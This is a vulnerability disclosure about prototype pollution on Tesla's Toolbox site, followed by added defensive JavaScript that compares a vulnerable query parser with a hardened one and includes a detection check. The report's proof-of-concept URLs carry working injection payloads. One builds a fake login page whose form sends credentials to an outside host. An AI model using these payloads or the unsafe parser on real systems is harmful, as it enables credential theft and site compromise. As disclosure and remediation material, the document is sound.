[toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS

Disclosed by BlackFan
  • Program Tesla
  • Disclosed date about 2 months ago
  • Reward $200
  • Priority P4 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by BlackFan

The Toolbox website uses the backbone.queryparams.js script, which is vulnerable to prototype pollution.
Using the site's existing JS code, it is possible to add arbitrary HTML to the page (inline JS is blocked by the CSP).

Report details
  • Submitted

  • Target Location

    *.teslamotors.com
  • Target category

    Website Testing

  • VRT

    Server-Side Injection > Content Spoofing > iframe Injection
  • Priority

    P4
  • Bug URL
    https://toolbox.teslamotors.com/
  • Description

    The Toolbox website uses the backbone.queryparams.js script, which is vulnerable to prototype pollution.

    For example:

    • Open URL https://toolbox.teslamotors.com/?__proto__.VULN=PROTOTYPE_POLLUTION
    • Check in the console that Object.prototype.VULN was created

    Screenshot at 15-16-00.png

    Using this, an attacker can change the logic of the scripts that are executed next, for example to perform HTML injection (in fact this is XSS, but the site has a strict Content-Security-Policy).

    HTML Injection PoC:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&&__proto__.display_name=%3Cmarquee%3E&__proto__.display_name=1
    PoC with Fake Login page via fullscreen iframe:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&__proto__.display_name=%3Ciframe/srcdoc=%27%3Chtml%20lang=%22en%22%3E%3Chead%3E%3Cbase%20href=%22https://toolbox.teslamotors.com/%22/%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/jquery-ui.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.tableTools.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.scroller.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-dialog.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-select.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-editable.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/font-awesome.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/tbxweb.css%22%3E%3C/head%3E%3Cbody%3E%3Cdiv%20id=%22body%22%3E%3Cdiv%20id=%22banner-layout%22%3E%3C/div%3E%3Cdiv%20id=%22main-menu%22%3E%3Cnav%20class=%22navbar%20navbar-default%20navbar-static-top%22role=%22navigation%22style=%22margin-bottom:0px%22%3E%3Cdiv%20class=%22container%22%3E%3Cdiv%20class=%22navbar-header%22%3E%3Cbutton%20type=%22button%22class=%22navbar-toggle%20collapsed%22data-toggle=%22collapse%22data-target=%22%23navbar%22aria-expanded=%22false%22aria-controls=%22navbar%22%3E%3Cspan%20class=%22sr-only%22%3EToggle%20navigation%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3C/button%3E%3Ca%20class=%22navbar-brand%22href=%22/%22style=%22padding-top:%200px;%20padding-left:%205px%22%3E%3Cimg%20style=%22height:75px%22alt=%22Brand%22src=%22/assets/images/tesla_flag.png%22%3E%3C/a%3E%3Ca%20class=%22navbar-brand%22style=%22font-size:%2023px%22href=%22/%22%3EToolbox%3C/a%3E%3C/div%3E%3Cdiv%20id=%22navbar%22class=%22navbar-collapse%20collapse%22%3E%3Cul%20class=%22nav%20navbar-nav%22%3E%3Cli%20class=%22dropdown%22%3E%3Ca%20href=%22/software/download%22class=%22dropdown-toggle%22role=%22button%22aria-expanded=%22false%22%3ESoftware%20%3Cspan%20class=%22caret%22%3E%3C/span%3E%3C/a%3E%3Cul%20class=%22dropdown-menu%22role=%22menu%22%3E%3Cli%3E%3Ca%20href=%22/software/download%22%3EDownload%3C/a%3E%3C/li%3E%3C/ul%3E%3C/li%3E%3C/ul%3E%3Cdiv%20id=%22search-form%22class=%22navbar-form%20navbar-left%22%3E%3C/div%3E%3Cdiv%20id=%22user-nav%22class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cdiv%3E%3Cul%20class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cli%3E%3Cspan%20class=%22glyphicon%20glyphicon-user%22aria-hidden=%22true%22%3E%3C/span%3E%20Login%20/%20Register%3C/a%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/nav%3E%3C/div%3E%3Cdiv%20id=%22contents%22%3E%3Cdiv%3E%3Cdiv%20id=%22content%22class=%22container%22%3E%3Cform%20target=_parent%20action=//blackfan.ru/fk%20class=%22form-signin%22role=%22form%22%3E%3Ch2%20class=%22form-signin-heading%22%3E%3Cfont%20color=%22red%22%3E%3Cb%3EFAKE%3C/b%3E%3C/font%3E%20Toolbox%20Online%20Portal%20(External%20Site)%3C/h2%3E%3Cp%20id=%22error-text%22class=%22help-block%22%3E%3C/p%3E%3Cdiv%20class=%22form-group%22%3E%3Cinput%20id=%22username%22name=%22login%22class=%22form-control%20login-control%22placeholder=%22username%22autofocus=%22%22%3E%3Cinput%20id=%22password%22name=%22password%22type=%22password%22class=%22form-control%20login-control%22placeholder=%22password%22%3E%3C/div%3E%3Cdiv%20id=%22captcha-container%22%3E%3C/div%3E%3Cbutton%20id=%22login-btnx%22type=%22submit%22class=%22btn%20btn-default%20btn-block%22%3ESign%20in%3C/button%3E%3C/form%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/body%3E%3C/html%3E%27/style=%22position:fixed;top:0;left:0;bottom:0;right:0;width:100%25;height:100%25;border:none;margin:0;padding:0;overflow:hidden;z-index:999999;%22%3E%3C/iframe%3E&__proto__.display_name=1

    Screenshot at 15-19-50.png

  • HTTP request
    Empty
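The report describes a query-string parser that expands dotted keys (`a.b=1`) into nested objects and thereby lets `__proto__.x=...` write onto `Object.prototype`. The following is an added example, not code from the report or from backbone.queryparams.js: a simplified model of such a parser in its vulnerable form, a hardened version that refuses prototype-walking segments, a detection check for request logs, and a small view that shows why a polluted `display_name` surfaces in rendered HTML. The parser logic is an assumption about how this class of library behaves, not a reproduction of the library itself; the query strings are the ones from the report.

```javascript
// Added example: vulnerable vs. hardened dotted-key query parser (assumed model,
// not backbone.queryparams.js itself), plus detection and safe rendering.

const FORBIDDEN_SEGMENTS = new Set(["__proto__", "constructor", "prototype"]);

// Split "?a.b=1&x=2" into [["a.b", "1"], ["x", "2"]], percent-decoding both sides.
function splitQuery(qs) {
  return qs.replace(/^\?/, "").split("&").filter(Boolean).map((pair) => {
    const idx = pair.indexOf("=");
    const rawKey = idx === -1 ? pair : pair.slice(0, idx);
    const rawVal = idx === -1 ? "" : pair.slice(idx + 1);
    return [decodeURIComponent(rawKey), decodeURIComponent(rawVal)];
  });
}

// VULNERABLE: walks the dotted path with plain property access. A segment named
// "__proto__" resolves to Object.prototype (an existing object, so it is reused),
// and the final assignment lands on every object in the realm.
function parseQueryUnsafe(qs) {
  const result = {};
  for (const [key, value] of splitQuery(qs)) {
    const parts = key.split(".");
    let cur = result;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== "object" || cur[parts[i]] === null) cur[parts[i]] = {};
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return result;
}

// HARDENED: drops any key containing a forbidden segment, builds null-prototype
// containers so no inherited accessor like __proto__ exists to walk through, and
// only reuses intermediate objects that are own properties.
function parseQuerySafe(qs) {
  const result = Object.create(null);
  for (const [key, value] of splitQuery(qs)) {
    const parts = key.split(".");
    if (parts.some((p) => FORBIDDEN_SEGMENTS.has(p))) continue;
    let cur = result;
    for (let i = 0; i < parts.length - 1; i++) {
      const own = Object.prototype.hasOwnProperty.call(cur, parts[i]);
      if (!own || typeof cur[parts[i]] !== "object" || cur[parts[i]] === null) {
        cur[parts[i]] = Object.create(null);
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return result;
}

// Defender-side check for access logs or a WAF rule: does any query key carry a
// prototype-walking segment? Decoding first catches %5F%5Fproto%5F%5F variants.
function flagsPollutionAttempt(qs) {
  return splitQuery(qs).some(([key]) =>
    key.split(".").some((p) => FORBIDDEN_SEGMENTS.has(p)));
}

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c]);
}

// A view reading user.display_name. If the user object has no own display_name,
// the lookup falls through to Object.prototype, which is where the pollution sits.
// The unsafe renderer interpolates raw; the safe one escapes and reads own props only.
function renderUserUnsafe(user) {
  return `<span class="user">${user.display_name}</span>`;
}
function renderUserSafe(user) {
  const name = Object.prototype.hasOwnProperty.call(user, "display_name")
    ? user.display_name : "guest";
  return `<span class="user">${escapeHtml(name)}</span>`;
}

// Constructed inputs (the first two are the query strings from the report).
const PROBE_QS = "?__proto__.VULN=PROTOTYPE_POLLUTION";
const INJECT_QS = "?__proto__.display_name=%3Cmarquee%3E";
const BENIGN_QS = "?page=2&filter.name=alice";

// Runs the unsafe parser, captures what an unrelated object now inherits, and
// cleans the prototype up again so the demonstration leaves no residue.
function demonstratePollution(qs, prop) {
  parseQueryUnsafe(qs);
  const leaked = ({})[prop];
  const rendered = renderUserUnsafe({});
  delete Object.prototype[prop];
  return { leaked, rendered };
}
```

Usage: `demonstratePollution(PROBE_QS, "VULN").leaked` returns the injected string, while `parseQuerySafe(PROBE_QS)` yields an empty object and leaves `Object.prototype` untouched; `flagsPollutionAttempt` returns true for both report URLs and false for the benign query. Deny-listing `__proto__` alone is not enough on its own: `constructor.prototype.x` reaches the same place, which is why all three segments are refused and containers are created with `Object.create(null)`.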
Activity